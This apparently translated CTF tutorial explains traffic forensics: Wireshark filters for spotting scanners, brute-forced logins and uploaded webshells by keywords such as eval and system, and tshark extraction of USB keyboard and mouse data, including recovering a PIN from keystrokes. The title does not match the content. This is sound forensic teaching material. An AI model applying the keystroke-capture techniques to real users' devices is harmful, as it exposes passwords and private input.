Enhancing Communication: How to Respond Effectively to ‘I’m Sorry, But I Can’t’

In CTF competitions, analyzing and forensically examining traffic packets is a very important type of challenge. Typically, these challenges provide a pcap file containing traffic data, and participants must filter out irrelevant traffic information from this file to find the flag or related clues based on key traffic information.The analysis of pcap traffic packets is usually done through a graphical network sniffer—Wireshark. This sniffer has been continuously improved by numerous developers and has now become one of the most widely used security tools. In previous articles, Dou Ge has already introduced it to everyone. Next, Dou Ge will introduce the classic types of questions and problem-solving ideas in current CTF traffic analysis.CTF question types are mainly divided into traffic packet repair, WEB traffic packet analysis, USB traffic packet analysis, and other traffic packet analysis.During the competition, there may be situations where opening the traffic packet provided by the question with Wireshark prompts a packet anomaly, as shown in the figure below:Repair using an online pcap packet repair tool:PracticeThe first “Baidu Cup” Information Security Attack and Defense Finals Online Selection: find the flagThe address of the pcap file: https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/BSRC3-1/findtheflag.capThe questions on WEB packet analysis mainly appear in the analysis of WEB attack behaviors. Typical WEB attack behaviors include WEB scanning, background directory brute force, background account brute force, WEBSHELL upload, SQL injection, etc.Question type:Obtain the WEB scanning tool used by the attacker through the given traffic packet.Problem-solving idea:Common WEB scanners include Awvs, Netsparker, Appscan, Webinspect, Rsas (NSFOCUS Aurora), Nessus, WebReaver, Sqlmap, etc. To identify which scanner the attacker used, you can filter the scanner features through Wireshark.Related command: http contains “scanner feature value”.Common scanner feature reference: https://www.freebuf.com/column/156291.htmPracticeAnheng August Monthly Competition Traffic Analysis: What scanner did the hacker use?The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6roIt is known that the attacker obtained the website’s background address through directory brute force. Please obtain the background address through the given traffic packet.To obtain the background address recorded in the traffic packet, you can filter the background URL features through Wireshark.Related command: http contains “background URL feature”.Common background URL feature reference: https://www.freebuf.com/column/156291.htmlPracticeAnheng August Monthly Competition Traffic Analysis: What is the background login address scanned by the hacker?The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6roIt is known that the attacker obtained the website’s background login account through brute force. Please obtain the correct account information through the given traffic packet.The WEB account login page usually uses the POST method request. To obtain the account information recorded in the traffic packet, you can filter out POST requests and keywords like ‘admin’ through Wireshark.Related command: http.request.method==”POST” && http contains == “keyword”.PracticeAnheng August Monthly Competition Traffic Analysis: What account and password did the hacker use to log in to the web background?The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6roIt is known that the attacker uploaded a malicious webshell file. Please restore the content of the webshell uploaded by the attacker through the given traffic packet.Webshell file uploads often use the POST method request, and the file content often contains keywords like eval, system, assert. To obtain the webshell recorded in the traffic packet, you can filter out POST requests and keywords through Wireshark.Related command: http.request.method==”POST” && http contains == “keyword”PracticeAnheng August Monthly Competition Traffic Analysis: What is the name of the webshell file uploaded by the hacker? What is the content?The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6roUSB traffic refers to the traffic of USB device interfaces. Attackers can obtain keystrokes, mouse movements and clicks, plaintext transmission communication of storage devices, USB wireless network card network transmission content, etc., by monitoring USB interface traffic. In CTF, USB traffic analysis mainly focuses on keyboard and mouse traffic.The USB protocol data part is in the Leftover Capture Data field, and the data length is eight bytes. The keyboard keystroke information is concentrated in the third byte. The data is shown in the figure below:As shown in the figure above, the keystroke information is 0x05, corresponding to the key “B”.The specific key mapping relationship can be referenced in the HID Usage ID in “USB Keyboard Protocol Key Codes”, link: https://wenku.baidu.com/view/9050c3c3af45b307e971971e.htmlThe flag is hidden in USB traffic and can be converted into keystrokes through the keyboard key codes in the USB protocol data.1. Use the tshark command in Kali Linux to extract cap data: tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt, and remove blank lines.2. Restore the data into keystrokes according to the HID Usage ID in “USB Keyboard Protocol Key Codes”.PracticeSecurity evaluators intercepted a segment of traffic through USB keyboard input of a 6-digit password during penetration testing of a bank card password input system, which also contains some other irrelevant USB device traffic. Can you recover the 6-digit password from it? The final submitted flag format is flag.The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8OgExtraction code: q6roPython keyboard key code conversion script: same as aboveThe USB protocol mouse data part is in the Leftover Capture Data field, and the data length is four bytes.The first byte represents the button. When it is 0x00, it means no button; when it is 0x01, it means the left button is pressed; when it is 0x02, it means the right button is pressed. The second byte can be regarded as a signed byte type, with the highest bit as the sign bit. When this value is positive, it represents how many pixels the mouse moves to the right horizontally; when negative, it represents how many pixels it moves to the left horizontally. The third byte is similar to the second byte, representing the vertical up and down movement offset. The data is shown in the figure below:As shown in the figure above, the data information is 0x00002000, indicating that the mouse moves 20 pixels vertically upward.The flag is hidden in USB traffic and can be converted into a flag through the mouse movement trajectory in the USB protocol data.1. Use the tshark command in Kali Linux to extract cap data: tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt, and remove blank lines.2. Restore the mouse movement trajectory according to the USB protocol mouse data.PracticeThis is a mouse traffic analysis question.The address of the pcap file:Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6roPython mouse data conversion script: same as aboveIn addition to conventional WEB and USB traffic, there may also be traffic such as SMTP, Telnet, etc., which are similar to WEB traffic analysis and will not be repeated.The above are the basic question types of traffic analysis in CTF competitions that Dou Ge understands. Welcome everyone to supplement.References:《记一道USB流量分析CTF题》,https://blog.csdn.net/qq_36609913/article/details/78578406CTF Wiki,https://ctf-wiki.github.io/ctf-wiki/introduction/resources/Pretty good at playing dumb and acting cuteReally want you to follow me (* ̄∇ ̄*)https://cloud.tencent.com/developer/article/1419465